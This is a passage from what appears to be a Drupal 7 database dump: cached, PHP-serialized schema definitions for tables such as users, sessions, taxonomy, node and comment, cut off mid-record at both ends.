key\";a:1:{i:0;s:8:\"filename\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:13:\"registry_file\";}s:9:\"semaphore\";a:5:{s:6:\"fields\";a:3:{s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"value\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"expire\";a:3:{s:4:\"type\";s:5:\"float\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;}}s:7:\"indexes\";a:2:{s:5:\"value\";a:1:{i:0;s:5:\"value\";}s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"name\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"semaphore\";}s:9:\"sequences\";a:4:{s:6:\"fields\";a:1:{s:5:\"value\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:5:\"value\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"sequences\";}s:8:\"sessions\";a:6:{s:6:\"fields\";a:7:{s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"sid\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:4:\"ssid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"cache\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"session\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}}s:11:\"primary key\";a:2:{i:0;s:3:\"sid\";i:1;s:4:\"ssid\";}s:7:\"indexes\";a:3:{s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"ssid\";a:1:{i:0;s:4:\"ssid\";}}s:12:\"foreign keys\";a:1:{s:12:\"session_user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:8:\"sessions\";}s:6:\"system\";a:5:{s:6:\"fields\";a:9:{s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"owner\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"bootstrap\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:14:\"schema_version\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:-1;s:4:\"size\";s:5:\"small\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"info\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}}s:11:\"primary key\";a:1:{i:0;s:8:\"filename\";}s:7:\"indexes\";a:2:{s:11:\"system_list\";a:5:{i:0;s:6:\"status\";i:1;s:9:\"bootstrap\";i:2;s:4:\"type\";i:3;s:6:\"weight\";i:4;s:4:\"name\";}s:9:\"type_name\";a:2:{i:0;s:4:\"type\";i:1;s:4:\"name\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:6:\"system\";}s:9:\"url_alias\";a:5:{s:6:\"fields\";a:4:{s:3:\"pid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:6:\"source\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"alias\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"pid\";}s:7:\"indexes\";a:2:{s:18:\"alias_language_pid\";a:3:{i:0;s:5:\"alias\";i:1;s:8:\"language\";i:2;s:3:\"pid\";}s:19:\"source_language_pid\";a:3:{i:0;s:6:\"source\";i:1;s:8:\"language\";i:2;s:3:\"pid\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:9:\"url_alias\";}s:18:\"taxonomy_term_data\";a:6:{s:6:\"fields\";a:6:{s:3:\"tid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"tid\";}s:12:\"foreign keys\";a:1:{s:10:\"vocabulary\";a:2:{s:5:\"table\";s:19:\"taxonomy_vocabulary\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}}s:7:\"indexes\";a:3:{s:13:\"taxonomy_tree\";a:3:{i:0;s:3:\"vid\";i:1;s:6:\"weight\";i:2;s:4:\"name\";}s:8:\"vid_name\";a:2:{i:0;s:3:\"vid\";i:1;s:4:\"name\";}s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:18:\"taxonomy_term_data\";}s:23:\"taxonomy_term_hierarchy\";a:6:{s:6:\"fields\";a:2:{s:3:\"tid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"parent\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"parent\";a:1:{i:0;s:6:\"parent\";}}s:12:\"foreign keys\";a:1:{s:18:\"taxonomy_term_data\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:11:\"primary key\";a:2:{i:0;s:3:\"tid\";i:1;s:6:\"parent\";}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:23:\"taxonomy_term_hierarchy\";}s:19:\"taxonomy_vocabulary\";a:6:{s:6:\"fields\";a:7:{s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:12:\"machine_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:9:\"hierarchy\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:4:\"name\";}}s:11:\"unique keys\";a:1:{s:12:\"machine_name\";a:1:{i:0;s:12:\"machine_name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:19:\"taxonomy_vocabulary\";}s:14:\"taxonomy_index\";a:5:{s:6:\"fields\";a:4:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"tid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:9:\"term_node\";a:3:{i:0;s:3:\"tid\";i:1;s:6:\"sticky\";i:2;s:7:\"created\";}s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}}s:12:\"foreign keys\";a:2:{s:12:\"tracked_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:4:\"term\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:14:\"taxonomy_index\";}s:12:\"cache_update\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:6:\"update\";s:4:\"name\";s:12:\"cache_update\";}s:7:\"authmap\";a:6:{s:6:\"fields\";a:4:{s:3:\"aid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"authname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"unique keys\";a:1:{s:8:\"authname\";a:1:{i:0;s:8:\"authname\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"aid\";}s:12:\"foreign keys\";a:1:{s:4:\"user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:7:\"authmap\";}s:15:\"role_permission\";a:6:{s:6:\"fields\";a:3:{s:3:\"rid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"permission\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:11:\"primary key\";a:2:{i:0;s:3:\"rid\";i:1;s:10:\"permission\";}s:7:\"indexes\";a:1:{s:10:\"permission\";a:1:{i:0;s:10:\"permission\";}}s:12:\"foreign keys\";a:1:{s:4:\"role\";a:2:{s:5:\"table\";s:5:\"roles\";s:7:\"columns\";a:1:{s:3:\"rid\";s:3:\"rid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:15:\"role_permission\";}s:4:\"role\";a:6:{s:6:\"fields\";a:3:{s:3:\"rid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:11:\"name_weight\";a:2:{i:0;s:4:\"name\";i:1;s:6:\"weight\";}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:4:\"role\";}s:5:\"users\";a:7:{s:6:\"fields\";a:16:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"pass\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mail\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"signature\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"signature_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"access\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"login\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"timezone\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"picture\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"init\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:7:\"indexes\";a:4:{s:6:\"access\";a:1:{i:0;s:6:\"access\";}s:7:\"created\";a:1:{i:0;s:7:\"created\";}s:4:\"mail\";a:1:{i:0;s:4:\"mail\";}s:7:\"picture\";a:1:{i:0;s:7:\"picture\";}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:12:\"foreign keys\";a:1:{s:16:\"signature_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:16:\"signature_format\";s:6:\"format\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:5:\"users\";}s:11:\"users_roles\";a:6:{s:6:\"fields\";a:2:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"rid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:2:{i:0;s:3:\"uid\";i:1;s:3:\"rid\";}s:7:\"indexes\";a:1:{s:3:\"rid\";a:1:{i:0;s:3:\"rid\";}}s:12:\"foreign keys\";a:2:{s:4:\"user\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}s:4:\"role\";a:2:{s:5:\"table\";s:5:\"roles\";s:7:\"columns\";a:1:{s:3:\"rid\";s:3:\"rid\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:11:\"users_roles\";}}',0,1423658773,1),('schema:runtime:','a:3:{s:5:\"users\";a:7:{s:6:\"fields\";a:16:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"pass\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mail\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"signature\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"signature_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"access\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"login\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"timezone\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"picture\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"init\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:7:\"indexes\";a:4:{s:6:\"access\";a:1:{i:0;s:6:\"access\";}s:7:\"created\";a:1:{i:0;s:7:\"created\";}s:4:\"mail\";a:1:{i:0;s:4:\"mail\";}s:7:\"picture\";a:1:{i:0;s:7:\"picture\";}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:12:\"foreign keys\";a:1:{s:16:\"signature_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:16:\"signature_format\";s:6:\"format\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:5:\"users\";}s:4:\"node\";a:7:{s:6:\"fields\";a:14:{s:3:\"nid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;s:7:\"default\";N;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"tnid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"translate\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:10:{s:12:\"node_changed\";a:1:{i:0;s:7:\"changed\";}s:12:\"node_created\";a:1:{i:0;s:7:\"created\";}s:14:\"node_frontpage\";a:4:{i:0;s:7:\"promote\";i:1;s:6:\"status\";i:2;s:6:\"sticky\";i:3;s:7:\"created\";}s:16:\"node_status_type\";a:3:{i:0;s:6:\"status\";i:1;s:4:\"type\";i:2;s:3:\"nid\";}s:15:\"node_title_type\";a:2:{i:0;s:5:\"title\";i:1;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:9:\"node_type\";a:1:{i:0;a:2:{i:0;s:4:\"type\";i:1;i:4;}}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:4:\"tnid\";a:1:{i:0;s:4:\"tnid\";}s:9:\"translate\";a:1:{i:0;s:9:\"translate\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}}s:11:\"unique keys\";a:1:{s:3:\"vid\";a:1:{i:0;s:3:\"vid\";}}s:12:\"foreign keys\";a:2:{s:13:\"node_revision\";a:2:{s:5:\"table\";s:13:\"node_revision\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}s:11:\"node_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:4:\"node\";}s:13:\"node_revision\";a:6:{s:6:\"fields\";a:10:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"log\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;}s:7:\"comment\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"promote\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"sticky\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:2:{s:3:\"nid\";a:1:{i:0;s:3:\"nid\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:12:\"foreign keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}}',0,1423658946,1),('schema:runtime:1','a:10:{s:7:\"comment\";a:6:{s:6:\"fields\";a:14:{s:3:\"cid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"pid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"subject\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"thread\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:4:\"mail\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:0;}s:8:\"homepage\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not 